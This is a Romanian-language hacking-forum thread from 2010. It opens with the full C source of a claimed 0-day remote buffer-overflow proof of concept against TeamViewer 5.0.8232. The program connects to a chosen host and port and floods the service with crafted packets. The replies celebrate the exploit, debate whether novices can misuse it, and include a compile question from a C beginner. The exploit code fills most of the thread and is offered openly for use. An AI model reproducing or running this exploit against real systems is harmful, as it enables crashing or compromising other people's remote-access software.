begood Posted May 18, 2010 Report Posted May 18, 2010 #include<stdio.h>#include<sys/types.h>#include<sys/socket.h>#include<netinet/in.h>#include<unistd.h>#define ALOC(tip,n) (tip*)malloc(sizeof(tip)*n)#define POCNAME "[*]TeamViewer 5.0.8232 remote BOF poc(0day)"#define AUTHOR "[*]fl0 fl0w" typedef int i32; typedef char i8; typedef short i16; enum { True=1, False=0, Error=-1 }; struct linger ling = {1,1}; i8* host; i16 port; i32 ver1,ver2,slen; void syntax(){ i8 *help[]={"\t-h hostname", "\t-p port(default 5938)", }; i32 i; size_t com=sizeof help / sizeof help[0]; for(i=0;i<com;i++){ printf("%s\n",help[i]); } } i32 arguments(i32 argc,i8** argv){ i32 i; argc--; for(i=1;i<argc;i++){ switch(argv[i][1]){ case'h': host=argv[++i]; break; case'p': port=atoi(argv[++i]); break; default:{ printf("error with argument nr %d:(%s)\n",i,argv[i]); return Error; exit(0); } } } } i32 main(i32 argc,i8** argv){ if(argc<2){ printf("%s\n%s\n",POCNAME,AUTHOR); printf("\tToo few arguments\n syntax is:\n"); syntax(); exit(0); } arguments(argc,argv); i32 sok,i, svcon, sokaddr; i8 *sendbytes=ALOC(i8,32768), *recevbytes=ALOC(i8,5548); printf("[*]Starting \n \t...\n"); struct sockaddr_in sockaddr_sok; sokaddr = sizeof(sockaddr_sok); sockaddr_sok.sin_family = AF_INET; sockaddr_sok.sin_addr.s_addr = inet_addr(host); sockaddr_sok.sin_port = htons(port); sok=socket(AF_INET,SOCK_STREAM,0); if(sok==-1){ printf("[*]FAILED SOCKET\n"); exit(0); } if(svcon=connect(sok,(struct sockaddr*)&sockaddr_sok,sokaddr)<0){ printf("Error with connection\n"); shutdown(sok,1); exit(0); } if(setsockopt(sok, SOL_SOCKET, SO_LINGER, (i8*)&ling, sizeof(ling))<0){ printf("Error setting the socket\n"); shutdown(sok,1); exit(0); } if(recv(sok,&ver1,1,0)!=1) exit(0); if(recv(sok, &ver2,1,0)!=1) exit(0); memset(sendbytes,0,250); recv(sok,recevbytes,sizeof(recevbytes),0); for(i=0;;i++) { if(!(i & 15)) printf("%d\r", i); sendbytes[0] = ver1; sendbytes[1] = ver2; sendbytes[2] = (i & 1) ? 15 : 21; *(i16 *)(sendbytes + 3) = slen; if(send(sok, sendbytes, 5, 0) != 5) break; if(slen) { memset(sendbytes, i, slen); if(send(sok, sendbytes, slen, 0) != slen) break; } } shutdown(sok,1); return 0; }bravo pentru fl0 fl0w !la cat mai multe ! Quote
adonisslanic Posted May 18, 2010 Report Posted May 18, 2010 Cand vad 0-day undeva, am un mic braingasm )) kudos for fl0 fl0w si desigur begood <()> Quote
Flubber Posted May 18, 2010 Report Posted May 18, 2010 Si asa multi kinderz voiau ceva pentru TeamViewer. Oricum felicitari lui fl0 fl0w, si bineinteles, mai ales ca este 0-day (pentru public cel putin)... keep it priv8.//e public.stiu, dar ma refeream sa nu ajunga pe mana kinderilor desi odata facut public slabe sanse Quote
begood Posted May 18, 2010 Author Report Posted May 18, 2010 (edited) e public.stiu, dar ma refeream sa nu ajunga pe mana kinderilor desi odata facut public slabe sansede ce crezi ca se posteaza sursa ? "kinderii" nu stiu compila Edited May 18, 2010 by begood Quote
phantomas90 Posted May 20, 2010 Report Posted May 20, 2010 Nu am mai lucrat pana acum cu C si nici C++.Imi zice ca nu gaseste librariile #include<sys/types.h>#include<sys/socket.h>#include<netinet/in.h>#include<unistd.h>Le are de obicei C-ul sau trebuie downloadate separat?nu stiu...poate sunt intrebari de nestiutor...dar as vrea sa invat un pic de C Quote
